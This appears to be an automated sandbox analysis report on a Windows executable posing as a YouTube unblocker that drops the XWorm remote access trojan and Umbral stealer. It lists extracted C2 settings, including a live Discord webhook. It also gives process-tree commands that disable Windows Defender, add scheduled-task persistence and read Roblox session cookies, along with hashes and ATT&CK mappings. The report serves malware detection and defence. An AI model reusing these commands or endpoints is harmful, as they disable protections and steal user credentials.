Overview

overview

10

Static

static

3

UnblоckYT .exe

windows7-x64

10

UnblоckYT .exe

windows10-2004-x64

Analysis

  • max time kernel
    171s
  • max time network
    188s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    05-08-2024 09:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    UnblоckYT .exe

  • Size

    2.0MB

  • MD5

    9507d39a1268cc9bc49a89a5b6b1efde

  • SHA1

    62919a92df361ec9f797066b8fd025d7e07c2795

  • SHA256

    d815fcc722bee4f1025644dce314ce8c0b41d05491fd1e3c382a3b403564075f

  • SHA512

    ffd75d68a7e8025c11922681b3214a8c96d70f7fd30f6eb7f6429e3865113f5406cc33ac76cd1580c03b64a52ff846c2c6e8d75968876ab7ac0625dd4873bbc0

  • SSDEEP

    49152:jDjlabwz9heWYJm2SnlA3tc4F7VP0q8bJQ555Yw6hzAdxopxRL:PqwuWYKeTv0q8bG55v3q5

Score
10/10
umbralxwormcredential_accessdiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

connection-arizona.gl.at.ply.gg:65211

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1269943614985863178/Snv_QcCVwSIoYNJg4xeEatpV3Q1YTnWJobZDi7PbgCWJqJTv3OWTmQttxL-3iAWsDAxu

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 10 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Delays execution with timeout.exe 10 IoCs
    evasion
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe
    "C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Users\Admin\AppData\Roaming\UnblockYT .exe
      "C:\Users\Admin\AppData\Roaming\UnblockYT .exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe
        "C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Users\Admin\AppData\Roaming\YTunblock.exe
          "C:\Users\Admin\AppData\Roaming\YTunblock.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1724
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\YTunblock.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1452
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YTunblock.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2448
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1496
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2112
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2856
          • C:\Users\Admin\AppData\Local\Temp\mnhnvy.exe
            "C:\Users\Admin\AppData\Local\Temp\mnhnvy.exe"
            5⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2380
            • C:\Windows\system32\attrib.exe
              "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\mnhnvy.exe"
              6⤵
              • Views/modifies file attributes
              PID:1760
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mnhnvy.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1916
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2032
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1588
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2688
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" os get Caption
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3032
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" computersystem get totalphysicalmemory
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:352
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              6⤵
                PID:2648
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:848
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic" path win32_VideoController get name
                6⤵
                • Detects videocard installed
                PID:1988
              • C:\Windows\system32\cmd.exe
                "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\mnhnvy.exe" && pause
                6⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                PID:1792
                • C:\Windows\system32\PING.EXE
                  ping localhost
                  7⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:1768
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Roaming\ .bat" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2720
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:2628
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:2876
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:2236
          • C:\Windows\system32\timeout.exe
            timeout /t 2 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:2028
          • C:\Windows\system32\timeout.exe
            timeout /t 2 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:640
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:1732
          • C:\Windows\system32\timeout.exe
            timeout /t 1 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:1764
          • C:\Windows\system32\timeout.exe
            timeout /t 2 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:964
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:1180
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            4⤵
            • Delays execution with timeout.exe
            PID:1580
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {3E6C02F3-4C82-40C2-AC8A-A0A49B0ED0D1} S-1-5-21-2257386474-3982792636-3902186748-1000:CTBHAMHL\Admin:Interactive:[1]
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1352
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        C:\Users\Admin\AppData\Roaming\svchost.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:2284
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        C:\Users\Admin\AppData\Roaming\svchost.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2492
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        C:\Users\Admin\AppData\Roaming\svchost.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1324
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2464

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Defense Evasion

    Hide Artifacts

    1
    T1564

    Hidden Files and Directories

    1
    T1564.001

    Modify Registry

    1
    T1112

    Credential Access

    Credentials from Password Stores

    1
    T1555

    Credentials from Web Browsers

    1
    T1555.003

    Unsecured Credentials

    1
    T1552

    Credentials In Files

    1
    T1552.001

    Discovery

    Remote System Discovery

    1
    T1018

    System Information Discovery

    2
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    System Network Configuration Discovery

    1
    T1016

    Internet Connection Discovery

    1
    T1016.001

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Command and Control

    Web Service

    1
    T1102

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      54cd9049ed58cfe384f4fd85f053f57d

      SHA1

      66ef83a2d5e6a90ade2805e9ee19890182dac48c

      SHA256

      4f6b495e2ef241485fb886d41cc95847d8bf29a0ac5faaabaaecb27bf90542d9

      SHA512

      9ae134d6c2ef51b324a114a0dbbcc66784ee26032633695e5523d617e7ca2e7df2ba2c2b4cdae535540313d9d3fe8742d7da944381b539a241db29000f39352f

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      4badba267270501c8bf7cdb3f814ee13

      SHA1

      3a92c4298c16154efc05c0dd184b1c042c0da56f

      SHA256

      047fdd85067ddf235b9fac73b74565ebbf6f950ddc1955fe420baa214ce45816

      SHA512

      e3541c1b3c8a72867434fe8940598f7e1709e63116a1b30a7618420bd960d7e32f1eceef67fd6bf99a2c115cdbe967ade0e2e01c6992aa39a6e44450597f8fa6

      Download Submit

    • C:\Users\Admin\AppData\Roaming\UnblockYT .exe
      Filesize

      1.8MB

      MD5

      ddf02dfa6df9ee4e157d675e55a055c7

      SHA1

      d6fc1b85378c9ffae39dfaa0fc3a6876193ce933

      SHA256

      6ec4b872cd4c8aa6859574fb02187bda31fb71cbace5026c9e0d89e078b61730

      SHA512

      79b32c992e1adea1700fac6e87fe1dac0562fc6ff927f16b7464fa32793ff41cc9c1ad9caf323a87213f0cda7c32d29e155e1a5eed8f18d09819d13515b1a4a0

      Download Submit

    • C:\Users\Admin\AppData\Roaming\YTunblock.exe
      Filesize

      1.2MB

      MD5

      5c130e0ea8b936a34372663dd763f722

      SHA1

      cbb1efd33b28851682ae3f9699c79ffe705c780d

      SHA256

      262edf6e52c54494f19dd41c37307c6fb85bbd37820fb10df68a01f2f2fef644

      SHA512

      a4e7bc8a551507648651740ce87388929ab9c7c3c4997ba0c1fb15116a6e433e1660f11a65886b0ed7552264df74ce055a84fad4c96a057fb0b4c4c37b149f2e

      Download Submit

    • C:\Users\Admin\AppData\Roaming\ .bat
      Filesize

      1KB

      MD5

      5807f01368bda72ebd943e8755fa2e0c

      SHA1

      f42940149bf0e256b14343c87f750c6cdac8ae72

      SHA256

      9c7be36ede7526e5d10e8af969dbf8d2b242ab9c52c107e9f42200fb0ee2ce2a

      SHA512

      31612135b0981a500b8b09c72809da0e66e0633885270aeb26de02c26dbdbb4d8b27299349cc352558a3c9ec18eda6840e380ca99473fde3882cbbe3e02dc107

      Download Submit

    • \Users\Admin\AppData\Local\Temp\mnhnvy.exe
      Filesize

      229KB

      MD5

      fed4a7197948ba327337b612254a673b

      SHA1

      2d1a9070dac7754ec592768654574fb933ec3730

      SHA256

      2f8e20e2e7712f7d896fe4fcbcb30161ef7abfc75b88584fc199c9203315efc7

      SHA512

      51bc82d032cee6689d62c98a5ce848297f8d55ecc03a4d506371db278abf418354294e9d5469d38be97fa41adb4d77932401dc0719eea33fb75c162fd0f32cff

      Download Submit

    • \Users\Admin\AppData\Roaming\YTunblock.sfx.exe
      Filesize

      1.6MB

      MD5

      10aefe8560bf4e437d2f47bd469a59ff

      SHA1

      57c72df8758b6afcaa47d3dd9b46009b0d68f7e5

      SHA256

      56a5db69837d84f160c2ad3fd7c46ab658df9979d3ba34834a8b514e63626f11

      SHA512

      d8f6fd44f11b140c36bfa1d9d732f31d5bc308887fcce3605391ce30fa2fa360379d5c47e7ea2bb9ef5d7dea5b8f82bdd0d7e643a7d7d9de37b478ac7f43646d

      Download Submit

    • memory/1324-153-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/1324-151-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/1324-152-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/1324-156-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/1724-43-0x0000000000DE0000-0x0000000001192000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/1724-74-0x0000000000DE0000-0x0000000001192000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/1724-69-0x0000000002620000-0x0000000002630000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1724-45-0x0000000000DE0000-0x0000000001192000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/1916-87-0x00000000022A0000-0x00000000022A8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1916-86-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2032-93-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2032-94-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2284-119-0x00000000001F0000-0x00000000005A2000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/2284-75-0x00000000001F0000-0x00000000005A2000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/2380-81-0x00000000012C0000-0x0000000001300000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2464-128-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2464-129-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2464-132-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2464-133-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2492-139-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/2492-144-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/2492-141-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

      Download

    • memory/2492-140-0x0000000001030000-0x00000000013E2000-memory.dmp

      Filesize

      3.7MB

      Download